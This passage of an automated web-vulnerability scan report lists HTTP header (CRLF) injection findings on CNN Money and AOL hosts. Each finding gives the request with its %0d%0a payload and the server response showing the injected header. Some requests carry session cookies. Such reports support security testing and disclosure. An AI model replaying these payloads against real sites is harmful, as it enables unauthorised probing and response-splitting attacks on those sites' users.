<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cec6e
52
...[SNIP]...

4.56. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload fd42d%0d%0a71f9eeb8f02 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/autos/cruz_recall/fd42d%0d%0a71f9eeb8f02 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/autos/cruz_recall/fd42d
71f9eeb8f02

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/autos/cruz_reca
...[SNIP]...

4.57. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 93492%0d%0ae298c488f49 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/93492%0d%0ae298c488f49/05/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/93492
e298c488f49
/05/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/93492
e298c488f49/05/04/m
...[SNIP]...

4.58. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 9b7de%0d%0af142d288158 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/9b7de%0d%0af142d288158/04/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/9b7de
f142d288158
/04/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/9b7de
f142d288158/04
...[SNIP]...

4.59. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 28f2d%0d%0ae137b1948d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/28f2d%0d%0ae137b1948d1/markets/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/28f2d
e137b1948d1
/markets/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/28f2d
e137b1948d1
...[SNIP]...

4.60. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 624dd%0d%0a7a44fd8182c was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/624dd%0d%0a7a44fd8182c/markets_newyork/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/624dd
7a44fd8182c
/markets_newyork/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/624dd
7a44fd81
...[SNIP]...

4.61. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 73d8b%0d%0ac2cadca0a5d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/73d8b%0d%0ac2cadca0a5d/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/73d8b
c2cadca0a5d
/index.htm
Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/73d8b

...[SNIP]...

4.62. http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/markets/markets_newyork/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 98825%0d%0a614e4316de0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/markets/markets_newyork/98825%0d%0a614e4316de0 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/markets/markets_newyork/98825
614e4316de0

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/markets/markets
...[SNIP]...

4.63. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 404f3%0d%0a9396d192c48 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/404f3%0d%0a9396d192c48/05/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/404f3
9396d192c48
/05/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/404f3
9396d192c48/05/04/n
...[SNIP]...

4.64. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 55fd8%0d%0a5f142f61b3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/55fd8%0d%0a5f142f61b3/04/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/55fd8
5f142f61b3
/04/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/55fd8
5f142f61b3/04/
...[SNIP]...

4.65. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c9ced%0d%0a3f30ec8af45 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/c9ced%0d%0a3f30ec8af45/news/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/c9ced
3f30ec8af45
/news/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/c9ced
3f30ec8af45
...[SNIP]...

4.66. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d83ab%0d%0a0af0d3835a2 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/d83ab%0d%0a0af0d3835a2/companies/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/d83ab
0af0d3835a2
/companies/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/d83ab
0af0d383
...[SNIP]...

4.67. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload bbae8%0d%0ad95d85a0b19 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/bbae8%0d%0ad95d85a0b19/exxon_oil_taxes/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/bbae8
d95d85a0b19
/exxon_oil_taxes/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/bbae8
d95
...[SNIP]...

4.68. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 63293%0d%0a77800aa245f was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/63293%0d%0a77800aa245f/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/63293
77800aa245f
/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9c496%0d%0a6d08e5ce5cb was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/exxon_oil_taxes/9c496%0d%0a6d08e5ce5cb HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/exxon_oil_taxes/9c496
6d08e5ce5cb

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6fb1%0d%0aa5f49d9e87c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c6fb1%0d%0aa5f49d9e87c/05/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/c6fb1
a5f49d9e87c
/05/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c6fb1
a5f49d9e87c/05/04/p
...[SNIP]...

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 75104%0d%0a0f14aac6d68 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/75104%0d%0a0f14aac6d68/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/75104
0f14aac6d68
/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/75104
0f14aac6d68/04
...[SNIP]...

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload da453%0d%0a7f4a946b499 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/da453%0d%0a7f4a946b499/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/da453
7f4a946b499
/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/da453
7f4a946b499
...[SNIP]...

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e1cf0%0d%0a723d722c4db was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/e1cf0%0d%0a723d722c4db/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/e1cf0
723d722c4db
/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/e1cf0
723d722c
...[SNIP]...

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 66a8e%0d%0a13db8c51deb was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/66a8e%0d%0a13db8c51deb/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/66a8e
13db8c51deb
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/66a8e
13db8
...[SNIP]...

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 11290%0d%0a85aae76790b was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/banks_interchange_fees/11290%0d%0a85aae76790b HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/banks_interchange_fees/11290
85aae76790b

Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/banks_interc
...[SNIP]...

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 64dc2%0d%0a487ff0957ca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&offerId=newmail-en-us-v2&seamless=novl&64dc2%0d%0a487ff0957ca=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 00:57:52 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?64dc2
487ff0957ca
=1&sitedomain=sns.webmail.aol.com&lang=en&seamless=novl&offerId=newmail-en-us-v2&authLev=0&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3Acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&locale=us
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"


4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.aol.com
Path:   /aol/tracking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 619d2%0d%0a09d9070d268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /aol/tracking?619d2%0d%0a09d9070d268=1 HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; rs_timezone=-18000000; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_guid=4a79a288e2ef41e5885351b80bce1f59:040511; TBS=prod:1304557062033:2; clickstreamid=772869981426160819; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 10:54:06 GMT
Set-Cookie: TBS=prod:1304557062033:2; Domain=search.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: TBS=prod:1304592846419:0; Domain=search.aol.com; Path=/
Location: http://search.aol.com/aol/search?s_it=channel_redir_fail&q=&619d2
09d9070d268
=1
Content-Length: 0
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 10:54:06 GMT
Keep-Alive: timeout=5, max=996
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d456f%0d%0a2970b16bd28 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
